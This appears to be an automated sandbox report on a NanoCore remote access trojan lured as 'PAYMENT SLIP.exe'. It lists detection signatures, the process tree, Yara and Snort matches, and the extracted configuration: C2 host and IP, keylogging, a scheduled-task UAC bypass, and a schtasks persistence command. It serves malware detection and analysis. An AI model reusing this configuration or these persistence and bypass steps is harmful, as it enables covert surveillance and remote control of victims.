Analysis Report PAYMENT SLIP.exe

Overview

General Information

Sample Name: PAYMENT SLIP.exe
Analysis ID: 412302
MD5: 50c9d58f61950484825d85a9a1372a7d
SHA1: 79df49a23af28b6322f1fa461167b1145fc927de
SHA256: 80726d3e380e4a7d0d1eee7f352c4a319e70dd4355a1a4f02ab27babc1a13d15
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PAYMENT SLIP.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
    • PAYMENT SLIP.exe (PID: 7116 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
      • MSBuild.exe (PID: 4228 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
      • PAYMENT SLIP.exe (PID: 5704 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
        • MSBuild.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
        • PAYMENT SLIP.exe (PID: 6900 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
          • MSBuild.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\PAYMENT SLIP.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
  • hmhrpib.exe (PID: 6024 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 6372 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
      • schtasks.exe (PID: 6508 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • hmhrpib.exe (PID: 6376 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 50C9D58F61950484825D85A9A1372A7D)
    • MSBuild.exe (PID: 6940 cmdline: 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' MD5: 88BBB7610152B48C2B3879473B17857E)
  • MSBuild.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)
    • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "c473d7c4-8173-4cff-8fb5-dfc81a12", "Group": "sea", "Domain1": "seaudo.hopto.org", "Domain2": "23.254.130.71", "Port": 3030, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    
<Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings are listed beneath each row)
0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q

      Unpacked PEs

      Source | Rule | Description | Author (matched strings are listed beneath each row)
      6.2.PAYMENT SLIP.exe.3160000.5.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0xe38d:$x1: NanoCore.ClientPluginHost
        • 0xe3ca:$x2: IClientNetworkHost
        • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      6.2.PAYMENT SLIP.exe.3160000.5.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
        • 0xe105:$x1: NanoCore Client.exe
        • 0xe38d:$x2: NanoCore.ClientPluginHost
        • 0xf9c6:$s1: PluginCommand
        • 0xf9ba:$s2: FileCommand
        • 0x1086b:$s3: PipeExists
        • 0x16622:$s4: PipeCreated
        • 0xe3b7:$s5: IClientLoggingHost
      6.2.PAYMENT SLIP.exe.3160000.5.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
      6.2.PAYMENT SLIP.exe.3160000.5.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
        • 0xe0f5:$a: NanoCore
        • 0xe105:$a: NanoCore
        • 0xe339:$a: NanoCore
        • 0xe34d:$a: NanoCore
        • 0xe38d:$a: NanoCore
        • 0xe154:$b: ClientPlugin
        • 0xe356:$b: ClientPlugin
        • 0xe396:$b: ClientPlugin
        • 0xe27b:$c: ProjectData
        • 0xec82:$d: DESCrypto
        • 0x1664e:$e: KeepAlive
        • 0x1463c:$g: LogClientMessage
        • 0x10837:$i: get_Connected
        • 0xefb8:$j: #=q
        • 0xefe8:$j: #=q
        • 0xf004:$j: #=q
        • 0xf034:$j: #=q
        • 0xf050:$j: #=q
        • 0xf06c:$j: #=q
        • 0xf09c:$j: #=q
        • 0xf0b8:$j: #=q
      10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe

        Sigma Overview

        AV Detection:

        Sigma detected: NanoCore
        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud:

        Sigma detected: NanoCore
        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information:

        Sigma detected: NanoCore
        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality:

        Sigma detected: NanoCore
        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6372, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Signature Overview

        AV Detection:

        Found malware configuration
        Source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp; Malware Configuration Extractor: NanoCore (same configuration as listed under Malware Configuration above)
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe; ReversingLabs: Detection: 42%
        Yara detected Nanocore RAT
        Source: Yara match; File source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara match; File source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara match; File source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara match; File source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara match; File source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe; Joe Sandbox ML: detected
        Machine Learning detection for sample
        Source: PAYMENT SLIP.exe; Joe Sandbox ML: detected
        Source: 10.2.PAYMENT SLIP.exe.23e0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 19.2.MSBuild.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 20.2.PAYMENT SLIP.exe.2f50000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 12.2.MSBuild.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 22.2.MSBuild.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen7
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack; Avira: Label: TR/NanoCore.fadte
        Source: 12.2.MSBuild.exe.61a0000.33.unpack; Avira: Label: TR/NanoCore.fadte
        Source: 1.2.PAYMENT SLIP.exe.3110000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.2.PAYMENT SLIP.exe.3060000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: PAYMENT SLIP.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: PAYMENT SLIP.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Windows\System.pdboo source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: indows\symbols\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbUGP source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb* source: MSBuild.exe, 0000000C.00000003.887823042.0000000001658000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: System.pdbX source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 0000000C.00000002.913261020.0000000005DA0000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe; Code function: 1_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe; Code function: 1_2_0040689A FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe; Code function: 1_2_00402902 FindFirstFileW
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe; Code function: 8_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe; Code function: 8_2_0040689A FindFirstFileW,FindClose
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe; Code function: 8_2_00402902 FindFirstFileW
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (12_2_06CD52C0)
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 4x nop then mov esp, ebp (12_2_06CD42A0)
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (12_2_06CD52B1)
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 4x nop then mov esp, ebp (12_2_06CD4110)

        Networking:

        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49745 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49746 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49747 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49748 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49750 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49755 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49763 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49769 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49770 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49772 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49773 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49780 -> 23.254.130.71:3030
        Source: Traffic; Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49781 -> 23.254.130.71:3030
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor; URLs: seaudo.hopto.org
        Source: Malware configuration extractor; URLs: 23.254.130.71
        Source: global traffic; TCP traffic: 192.168.2.4:49745 -> 23.254.130.71:3030
        Source: Joe Sandbox View; ASN Name: HOSTWINDSUS HOSTWINDSUS
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe Code function: 12_2_057D2CF6 WSARecv,12_2_057D2CF6
        Source: unknown DNS traffic detected: queries for: seaudo.hopto.org
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp String found in binary or memory: http://google.com
        Source: PAYMENT SLIP.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe Code function: 1_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056E3
        Source: MSBuild.exe, 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        Yara detected Nanocore RAT

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Executable has a suspicious name (potential lure to open the executable)
        Source: PAYMENT SLIP.exe, Static file information: Suspicious name
        Initial sample is a PE file and has a suspicious name
        Source: initial sample, Static PE information: Filename: PAYMENT SLIP.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, Code function: 12_2_057D152A NtQuerySystemInformation,12_2_057D152A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, Code function: 12_2_057D14EF NtQuerySystemInformation,12_2_057D14EF
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exe, Code function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe, Code function: 8_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004035D8
        Source: PAYMENT SLIP.exe, 00000001.00000003.656783504.00000000034BF000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 00000006.00000003.682815519.000000000344F000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 0000000A.00000003.708126945.0000000003246000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, 00000014.00000003.740614200.00000000031E6000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT SLIP.exe
        Source: PAYMENT SLIP.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 12.2.MSBuild.exe.48f0272.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f0272.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48632ce.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
